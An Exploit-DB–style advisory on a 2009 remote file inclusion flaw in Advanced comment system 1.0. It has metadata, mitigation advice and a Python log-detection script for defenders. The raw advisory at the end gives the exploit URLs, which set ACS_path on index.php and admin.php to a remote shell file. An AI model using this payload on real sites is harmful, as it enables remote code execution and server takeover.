Vendor: Advanced comment system
By: kurdish hackers team
CVSS: 7.5 (HIGH)
Type: Remote File Inclusion
CWE: 98
Product Name: Advanced comment system
Affected Version From: 1
Affected Version To: 1
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

Advanced comment system 1.0 Remote File Inclusion Vulnerability

Advanced comment system 1.0 is vulnerable to Remote File Inclusion. The vulnerable scripts are 'index.php' and 'admin.php', located in the 'advanced_comment_system' directory. An attacker can exploit the vulnerability by sending a malicious URL to either script; the URL carries, in the ACS_path parameter, the path to a malicious file, which is then executed on the vulnerable server as arbitrary code.

Mitigation:

The best way to mitigate this vulnerability is to validate user input and filter out any malicious code before it is used. The web application should also be kept up to date with the latest security patches.
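A detection sketch for the request pattern described above, added here as an example and not part of the original advisory or the product's code: it flags access-log requests to the two named scripts that supply `ACS_path`. The combined log format, the sample lines and the function names are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Scripts and parameter named in the advisory.
TARGET = re.compile(r"/advanced_comment_system/(?:index|admin)\.php$", re.I)
PARAM = "ACS_path"
# A value starting with a URL scheme or stream wrapper points include() off-host.
REMOTE = re.compile(r"^\s*(?:[a-z][a-z0-9+.-]*://|data:)", re.I)
# Request field of a combined-format access log line (assumed log format).
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Constructed sample lines: documentation IPs and a placeholder host.
SAMPLE = [
    '203.0.113.7 - - [10/Sep/2009:10:00:00 +0000] "GET /advanced_comment_system/index.php HTTP/1.1" 200 512',
    '203.0.113.9 - - [10/Sep/2009:10:00:05 +0000] "GET /advanced_comment_system/admin.php?ACS_path=http://files.example.invalid/a.txt? HTTP/1.1" 200 0',
    '203.0.113.9 - - [10/Sep/2009:10:00:09 +0000] "GET /blog/advanced_comment_system/index.php?ACS_path=%2568ttp%253A%252F%252Ffiles.example.invalid%252Fa.txt HTTP/1.0" 200 0',
    '198.51.100.4 - - [10/Sep/2009:10:01:00 +0000] "GET /advanced_comment_system/index.php?ACS_path[]=../ HTTP/1.1" 200 0',
]

def fully_decode(value, rounds=3):
    """Conservatively undo nested percent-encoding before matching."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def classify(line):
    """Return 'remote', 'override' or None for one access log line."""
    m = REQUEST.search(line)
    if not m:
        return None
    url = urlsplit(m.group(1))
    if not TARGET.search(fully_decode(url.path)):
        return None
    verdict = None
    for key, value in parse_qsl(url.query, keep_blank_values=True):
        # PHP also accepts the array form ACS_path[]=...; compare the base name.
        if fully_decode(key).split("[")[0] != PARAM:
            continue
        if REMOTE.match(fully_decode(value)):
            return "remote"
        verdict = "override"  # a client-supplied include path is suspect in itself
    return verdict

if __name__ == "__main__":
    for line in SAMPLE:
        print(classify(line), "|", line.split('"')[1])
```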

Exploit-DB raw data:

======================================================

 Advanced comment system1.0  Remote File Inclusion Vulnerability


<<!>> Found by  :  kurdish hackers team

<<!>> C0ntact : pshela [at] YaHoo .com
                  
<<!>> Groups : Kurd-Team

<<!>> site   : www.kurdteam.org

=======================================================
+++++++++++++++++++ Script information+++++++++++++++++
=======================================================

<<->> script   ::  Advanced_comment_system_1-0

<<->> download script :: http://www.plohni.com/wb/content/php/download/Advanced_comment_system_1-0.zip

=======================================================
+++++++++++++++++++++++ Exploit +++++++++++++++++++++++
=======================================================


<<->> Exploit ::
 
 >>> www.site/path /advanced_comment_system/index.php?ACS_path=[shell.txt?]
                                   /advanced_comment_system/admin.php?ACS_path=[shell.txt?]


=======================================================
 
=======================================================

<<->> All friends , Zryan_kurd , RootSyS , Bravy_Boy all member kurdish hackers team

# milw0rm.com [2009-09-10]